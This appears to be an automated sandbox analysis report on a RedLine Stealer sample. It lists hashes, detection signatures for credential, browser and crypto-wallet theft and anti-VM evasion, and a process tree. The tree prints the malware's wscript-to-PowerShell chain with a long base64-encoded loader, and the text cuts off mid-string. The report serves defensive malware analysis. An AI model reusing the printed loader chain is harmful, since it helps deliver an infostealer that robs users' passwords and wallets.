Edit tour
Windows
Analysis Report
f6FauZ2CEz.exe
Overview
General Information
Sample name: | f6FauZ2CEz.exerenamed because original name is a hash value |
Original sample name: | 1544dbca0efc2c0105dd7d52a21a8891.exe |
Analysis ID: | 1431938 |
MD5: | 1544dbca0efc2c0105dd7d52a21a8891 |
SHA1: | 7fbacdb27457829215cd182eab0a4e4bb4379648 |
SHA256: | d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970 |
Tags: | exeRedLineStealer |
Infos: | |
Detection
RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RedLine Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- f6FauZ2CEz.exe (PID: 6696 cmdline:
"C:\Users\ user\Deskt op\f6FauZ2 CEz.exe" MD5: 1544DBCA0EFC2C0105DD7D52A21A8891) - wscript.exe (PID: 4928 cmdline:
"wscript.e xe" "C:\Us ers\user\s tart.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 5728 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\tem p.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1188 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -command " [System.Te xt.Encodin g]::UTF8.G etString([ System.Con vert]::Fro mBase64Str ing('ZnVuY 3Rpb24gRGV jb21wcmVzc 0J5dGVzKCR jb21wcmVzc 2VkRGF0YSk geyAkbXMgP SBbSU8uTWV tb3J5U3RyZ WFtXTo6bmV 3KChbU3lzd GVtLkNvbnZ lcnRdOjpGc m9tQmFzZTY 0U3RyaW5nK CRjb21wcmV zc2VkRGF0Y SkpKTsgJG1 zLlBvc2l0a W9uID0gMDs gJGRlZmxhd GVTdHJlYW0 gPSBbSU8uQ 29tcHJlc3N pb24uRGVmb GF0ZVN0cmV hbV06Om5ld ygkbXMsIFt JTy5Db21wc mVzc2lvbi5 Db21wcmVzc 2lvbk1vZGV dOjpEZWNvb XByZXNzKTs gJGJ1ZmZlc iA9IFtieXR lW11dOjpuZ XcoNDA5Nik 7ICRtcyA9I FtJTy5NZW1 vcnlTdHJlY W1dOjpuZXc oKTsgd2hpb GUgKCR0cnV lKSB7ICRjb 3VudCA9ICR kZWZsYXRlU 3RyZWFtLlJ lYWQoJGJ1Z mZlciwgMCw gJGJ1ZmZlc i5MZW5ndGg pOyBpZiAoJ GNvdW50IC1 lcSAwKSB7I GJyZWFrIH0 gJG1zLldya XRlKCRidWZ mZXIsIDAsI CRjb3VudCk gfSAkZGVmb GF0ZVN0cmV hbS5DbG9zZ SgpOyAkbXM uVG9BcnJhe SgpIH0NCg0 KIyAiVGhlI HN1cmVzdCB 3YXkgdG8gY 29ycnVwdCB hIHlvdXRoI GlzIHRvIGl uc3RydWN0I GhpbSB0byB ob2xkIGluI GhpZ2hlciB lc3RlZW0gd Ghvc2Ugd2h vIHRoaW5rI GFsaWtlIHR oYW4gdGhvc 2Ugd2hvIHR oaW5rIGRpZ mZlcmVudGx 5LiINCiMgI kluIGhlYXZ lbiwgYWxsI HRoZSBpbnR lcmVzdGluZ yBwZW9wbGU gYXJlIG1pc 3NpbmcuIg0 KIyAiSGUgd 2hvIGhhcyB hIHdoeSB0b yBsaXZlIGN hbiBiZWFyI GFsbW9zdCB hbnkgaG93L iINCiMgIlR vIGxpdmUga XMgdG8gc3V mZmVyLCB0b yBzdXJ2aXZ lIGlzIHRvI GZpbmQgc29 tZSBtZWFua W5nIGluIHR oZSBzdWZmZ XJpbmcuIg0 KIyAiV2l0a G91dCBtdXN pYywgbGlmZ SB3b3VsZCB iZSBhIG1pc 3Rha2UuIg0 KDQoNCmZ1b mN0aW9uIFJ ldmVyc2VTd HJpbmcoJGl ucHV0U3Rya W5nKSB7DQo gICAgJGNoY XJBcnJheSA 9ICRpbnB1d FN0cmluZy5 Ub0NoYXJBc nJheSgpDQo gICAgJHJld mVyc2VkQXJ yYXkgPSAkY 2hhckFycmF 5Wy0xLi4tK CRjaGFyQXJ yYXkuTGVuZ 3RoKV0NCiA gICAkcmV2Z XJzZWRTdHJ pbmcgPSAta m9pbiAkcmV 2ZXJzZWRBc nJheQ0KICA gIHJldHVyb iAkcmV2ZXJ zZWRTdHJpb mcNCn0NCiM gIlRoZXJlI GlzIGFsd2F 5cyBzb21lI G1hZG5lc3M gaW4gbG92Z S4gQnV0IHR oZXJlIGlzI GFsc28gYWx 3YXlzIHNvb WUgcmVhc29 uIGluIG1hZ G5lc3MuIg0 KIyAiVGhhd CB3aGljaCB kb2VzIG5vd CBraWxsIHV zIG1ha2VzI HVzIHN0cm9 uZ2VyLiINC g0KZnVuY3R pb24gQ2xvc 2UtUHJvY2V zcyB7DQogI CAgcGFyYW0 oDQogICAgI CAgIFtzdHJ pbmddJFByb 2Nlc3NOYW1 lDQogICAgK Q0KDQogICA gJHByb2Nlc 3MgPSBHZXQ tUHJvY2Vzc yAtTmFtZSA kUHJvY2Vzc 05hbWUgLUV ycm9yQWN0a W9uIFNpbGV udGx5Q29ud GludWUNCg0 KICAgIGlmI CgkcHJvY2V zcyAtbmUgJ G51bGwpIHs NCiAgICAgI CAgU3RvcC1 Qcm9jZXNzI C1OYW1lICR Qcm9jZXNzT mFtZSAtRm9 yY2UNCgl9D Qp9DQojICJ JbiBpbmRpd mlkdWFscyw gaW5zYW5pd HkgaXMgcmF yZTsgYnV0I GluIGdyb3V wcywgcGFyd GllcywgbmF 0aW9ucywgY W5kIGVwb2N ocywgaXQga XMgdGhlIHJ 1bGUuIg0KI yAiVGhlIG1 hbiBvZiBrb m93bGVkZ2U gbXVzdCBiZ SBhYmxlIG5 vdCBvbmx5I HRvIGxvdmU gaGlzIGVuZ W1pZXMgYnV 0IGFsc28gd G8gaGF0ZSB oaXMgZnJpZ W5kcy4iDQo jICJBIHRoa W5rZXIgc2V lcyBoaXMgb 3duIGFjdGl vbnMgYXMgZ XhwZXJpbWV udHMgYW5kI